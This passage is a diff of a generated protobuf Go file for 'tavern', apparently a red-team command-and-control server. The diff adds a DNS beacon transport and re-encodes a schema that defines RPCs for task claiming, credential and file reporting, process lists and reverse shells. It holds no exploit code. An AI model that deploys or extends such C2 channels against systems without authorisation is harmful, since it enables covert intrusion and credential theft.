a/tavern/internal/c2/c2pb/c2.pb.go +++ b/tavern/internal/c2/c2pb/c2.pb.go @@ -1,7 +1,7 @@ // Code generated by protoc-gen-go. DO NOT EDIT. // versions: -// protoc-gen-go v1.36.5 -// protoc v3.21.12 +// protoc-gen-go v1.36.11 +// protoc v6.32.0 // source: c2.proto package c2pb @@ -78,6 +78,7 @@ const ( Beacon_TRANSPORT_UNSPECIFIED Beacon_Transport = 0 Beacon_TRANSPORT_GRPC Beacon_Transport = 1 Beacon_TRANSPORT_HTTP1 Beacon_Transport = 2 + Beacon_TRANSPORT_DNS Beacon_Transport = 3 ) // Enum value maps for Beacon_Transport. 
@@ -86,11 +87,13 @@ var ( 0: "TRANSPORT_UNSPECIFIED", 1: "TRANSPORT_GRPC", 2: "TRANSPORT_HTTP1", + 3: "TRANSPORT_DNS", } Beacon_Transport_value = map[string]int32{ "TRANSPORT_UNSPECIFIED": 0, "TRANSPORT_GRPC": 1, "TRANSPORT_HTTP1": 2, + "TRANSPORT_DNS": 3, } ) @@ -1195,170 +1198,103 @@ func (x *ReverseShellResponse) GetData() []byte { var File_c2_proto protoreflect.FileDescriptor -var file_c2_proto_rawDesc = string([]byte{ - 0x0a, 0x08, 0x63, 0x32, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, 0x02, 0x63, 0x32, 0x1a, 0x1f, - 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, - 0x74, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x1a, - 0x0e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x22, - 0x27, 0x0a, 0x05, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, 0x65, 0x6e, - 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, 0x69, 0x64, - 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x22, 0xa6, 0x02, 0x0a, 0x06, 0x42, 0x65, 0x61, - 0x63, 0x6f, 0x6e, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, - 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, - 0x69, 0x65, 0x72, 0x12, 0x1c, 0x0a, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, - 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, - 0x6c, 0x12, 0x1c, 0x0a, 0x04, 0x68, 0x6f, 0x73, 0x74, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0b, 0x32, - 0x08, 0x2e, 0x63, 0x32, 0x2e, 0x48, 0x6f, 0x73, 0x74, 0x52, 0x04, 0x68, 0x6f, 0x73, 0x74, 0x12, - 0x1f, 0x0a, 0x05, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x09, - 0x2e, 0x63, 0x32, 0x2e, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x52, 0x05, 0x61, 0x67, 0x65, 0x6e, 0x74, - 0x12, 0x1a, 0x0a, 0x08, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x76, 0x61, 0x6c, 0x18, 0x05, 0x20, 0x01, - 
0x28, 0x04, 0x52, 0x08, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x76, 0x61, 0x6c, 0x12, 0x32, 0x0a, 0x09, - 0x74, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x18, 0x06, 0x20, 0x01, 0x28, 0x0e, 0x32, - 0x14, 0x2e, 0x63, 0x32, 0x2e, 0x42, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x2e, 0x54, 0x72, 0x61, 0x6e, - 0x73, 0x70, 0x6f, 0x72, 0x74, 0x52, 0x09, 0x74, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, - 0x22, 0x4f, 0x0a, 0x09, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x12, 0x19, 0x0a, - 0x15, 0x54, 0x52, 0x41, 0x4e, 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, - 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x12, 0x0a, 0x0e, 0x54, 0x52, 0x41, 0x4e, - 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x47, 0x52, 0x50, 0x43, 0x10, 0x01, 0x12, 0x13, 0x0a, 0x0f, - 0x54, 0x52, 0x41, 0x4e, 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x48, 0x54, 0x54, 0x50, 0x31, 0x10, - 0x02, 0x22, 0xfe, 0x01, 0x0a, 0x04, 0x48, 0x6f, 0x73, 0x74, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, - 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, - 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, - 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x2d, - 0x0a, 0x08, 0x70, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0e, - 0x32, 0x11, 0x2e, 0x63, 0x32, 0x2e, 0x48, 0x6f, 0x73, 0x74, 0x2e, 0x50, 0x6c, 0x61, 0x74, 0x66, - 0x6f, 0x72, 0x6d, 0x52, 0x08, 0x70, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x12, 0x1d, 0x0a, - 0x0a, 0x70, 0x72, 0x69, 0x6d, 0x61, 0x72, 0x79, 0x5f, 0x69, 0x70, 0x18, 0x04, 0x20, 0x01, 0x28, - 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6d, 0x61, 0x72, 0x79, 0x49, 0x70, 0x22, 0x74, 0x0a, 0x08, - 0x50, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x12, 0x18, 0x0a, 0x14, 0x50, 0x4c, 0x41, 0x54, - 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, - 0x10, 0x00, 0x12, 0x14, 0x0a, 0x10, 
0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x57, - 0x49, 0x4e, 0x44, 0x4f, 0x57, 0x53, 0x10, 0x01, 0x12, 0x12, 0x0a, 0x0e, 0x50, 0x4c, 0x41, 0x54, - 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4c, 0x49, 0x4e, 0x55, 0x58, 0x10, 0x02, 0x12, 0x12, 0x0a, 0x0e, - 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4d, 0x41, 0x43, 0x4f, 0x53, 0x10, 0x03, - 0x12, 0x10, 0x0a, 0x0c, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x42, 0x53, 0x44, - 0x10, 0x04, 0x22, 0x59, 0x0a, 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, - 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x22, 0x0a, 0x04, 0x74, 0x6f, - 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, - 0x74, 0x63, 0x68, 0x2e, 0x54, 0x6f, 0x6d, 0x65, 0x52, 0x04, 0x74, 0x6f, 0x6d, 0x65, 0x12, 0x1d, - 0x0a, 0x0a, 0x71, 0x75, 0x65, 0x73, 0x74, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x09, 0x71, 0x75, 0x65, 0x73, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0x1d, 0x0a, - 0x09, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x10, 0x0a, 0x03, 0x6d, 0x73, - 0x67, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6d, 0x73, 0x67, 0x22, 0xe3, 0x01, 0x0a, - 0x0a, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x0e, 0x0a, 0x02, 0x69, - 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x16, 0x0a, 0x06, 0x6f, - 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x6f, 0x75, 0x74, - 0x70, 0x75, 0x74, 0x12, 0x23, 0x0a, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x18, 0x03, 0x20, 0x01, - 0x28, 0x0b, 0x32, 0x0d, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, - 0x72, 0x52, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x42, 0x0a, 0x0f, 0x65, 0x78, 0x65, 0x63, - 0x5f, 0x73, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x61, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, - 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, 0x70, 
0x72, 0x6f, 0x74, 0x6f, - 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x52, 0x0d, 0x65, - 0x78, 0x65, 0x63, 0x53, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x41, 0x74, 0x12, 0x44, 0x0a, 0x10, - 0x65, 0x78, 0x65, 0x63, 0x5f, 0x66, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, 0x5f, 0x61, 0x74, - 0x18, 0x05, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, - 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, - 0x6d, 0x70, 0x52, 0x0e, 0x65, 0x78, 0x65, 0x63, 0x46, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, - 0x41, 0x74, 0x22, 0x37, 0x0a, 0x11, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, - 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x22, 0x0a, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, - 0x6e, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0a, 0x2e, 0x63, 0x32, 0x2e, 0x42, 0x65, 0x61, - 0x63, 0x6f, 0x6e, 0x52, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x22, 0x34, 0x0a, 0x12, 0x43, - 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, - 0x65, 0x12, 0x1e, 0x0a, 0x05, 0x74, 0x61, 0x73, 0x6b, 0x73, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, - 0x32, 0x08, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x52, 0x05, 0x74, 0x61, 0x73, 0x6b, - 0x73, 0x22, 0x27, 0x0a, 0x11, 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, - 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x01, - 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x22, 0x2a, 0x0a, 0x12, 0x46, 0x65, - 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, - 0x12, 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0c, 0x52, - 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0x68, 0x0a, 0x17, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x12, 
0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, - 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x34, 0x0a, 0x0a, 0x63, 0x72, - 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x14, - 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, - 0x74, 0x69, 0x61, 0x6c, 0x52, 0x0a, 0x63, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, - 0x22, 0x1a, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, - 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x52, 0x0a, 0x11, - 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, - 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x24, 0x0a, 0x05, 0x63, 0x68, - 0x75, 0x6e, 0x6b, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, - 0x69, 0x74, 0x63, 0x68, 0x2e, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, - 0x22, 0x14, 0x0a, 0x12, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, - 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x5e, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, - 0x73, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, - 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x29, 0x0a, 0x04, 0x6c, - 0x69, 0x73, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x65, 0x6c, 0x64, 0x72, - 0x69, 0x74, 0x63, 0x68, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, - 0x52, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x22, 0x1b, 0x0a, 0x19, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 
0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, - 0x6e, 0x73, 0x65, 0x22, 0x41, 0x0a, 0x17, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, - 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x26, - 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, - 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x06, - 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x22, 0x1a, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, - 0x73, 0x65, 0x22, 0x73, 0x0a, 0x13, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, - 0x6c, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x2f, 0x0a, 0x04, 0x6b, 0x69, 0x6e, - 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, - 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, - 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, - 0x74, 0x61, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, 0x64, 0x61, 0x74, 0x61, 0x12, 0x17, - 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x03, 0x20, 0x01, 0x28, 0x03, 0x52, - 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x22, 0x5b, 0x0a, 0x14, 0x52, 0x65, 0x76, 0x65, 0x72, - 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, - 0x2f, 0x0a, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x1b, 0x2e, - 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, - 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, 0x6e, 0x64, - 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, 0x74, 0x61, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, - 0x64, 0x61, 0x74, 0x61, 0x2a, 0x8f, 0x01, 0x0a, 0x17, 0x52, 0x65, 0x76, 0x65, 0x72, 
0x73, 0x65, - 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x4b, 0x69, 0x6e, 0x64, - 0x12, 0x2a, 0x0a, 0x26, 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, 0x4c, - 0x4c, 0x5f, 0x4d, 0x45, 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x55, - 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x23, 0x0a, 0x1f, - 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, 0x4c, 0x4c, 0x5f, 0x4d, 0x45, - 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x44, 0x41, 0x54, 0x41, 0x10, - 0x01, 0x12, 0x23, 0x0a, 0x1f, 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, - 0x4c, 0x4c, 0x5f, 0x4d, 0x45, 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, - 0x50, 0x49, 0x4e, 0x47, 0x10, 0x02, 0x32, 0xfc, 0x03, 0x0a, 0x02, 0x43, 0x32, 0x12, 0x3d, 0x0a, - 0x0a, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x12, 0x15, 0x2e, 0x63, 0x32, - 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x71, 0x75, 0x65, - 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, - 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x12, 0x3d, 0x0a, 0x0a, - 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, - 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, - 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x30, 0x01, 0x12, 0x4d, 0x0a, 0x10, 0x52, - 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x12, - 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, - 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 
0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, - 0x61, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x3d, 0x0a, 0x0a, 0x52, 0x65, - 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, - 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, - 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, - 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x28, 0x01, 0x12, 0x50, 0x0a, 0x11, 0x52, 0x65, 0x70, - 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x1c, - 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, - 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1d, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, - 0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x4f, 0x0a, 0x10, 0x52, - 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, - 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, - 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, - 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x12, 0x47, 0x0a, 0x0c, - 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x12, 0x17, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, - 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x18, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, - 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, - 0x00, 0x28, 0x01, 0x30, 0x01, 0x42, 0x23, 0x5a, 0x21, 0x72, 
0x65, 0x61, 0x6c, 0x6d, 0x2e, 0x70, - 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, 0x6e, 0x2f, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x6e, - 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x63, 0x32, 0x70, 0x62, 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, - 0x6f, 0x33, -}) +const file_c2_proto_rawDesc = "" + + "\n" + + "\bc2.proto\x12\x02c2\x1a\x1fgoogle/protobuf/timestamp.proto\x1a\x0eeldritch.proto\"'\n" + + "\x05Agent\x12\x1e\n" + + "\n" + + "identifier\x18\x01 \x01(\tR\n" + + "identifier\"\xb9\x02\n" + + "\x06Beacon\x12\x1e\n" + + "\n" + + "identifier\x18\x01 \x01(\tR\n" + + "identifier\x12\x1c\n" + + "\tprincipal\x18\x02 \x01(\tR\tprincipal\x12\x1c\n" + + "\x04host\x18\x03 \x01(\v2\b.c2.HostR\x04host\x12\x1f\n" + + "\x05agent\x18\x04 \x01(\v2\t.c2.AgentR\x05agent\x12\x1a\n" + + "\binterval\x18\x05 \x01(\x04R\binterval\x122\n" + + "\ttransport\x18\x06 \x01(\x0e2\x14.c2.Beacon.TransportR\ttransport\"b\n" + + "\tTransport\x12\x19\n" + + "\x15TRANSPORT_UNSPECIFIED\x10\x00\x12\x12\n" + + "\x0eTRANSPORT_GRPC\x10\x01\x12\x13\n" + + "\x0fTRANSPORT_HTTP1\x10\x02\x12\x11\n" + + "\rTRANSPORT_DNS\x10\x03\"\xfe\x01\n" + + "\x04Host\x12\x1e\n" + + "\n" + + "identifier\x18\x01 \x01(\tR\n" + + "identifier\x12\x12\n" + + "\x04name\x18\x02 \x01(\tR\x04name\x12-\n" + + "\bplatform\x18\x03 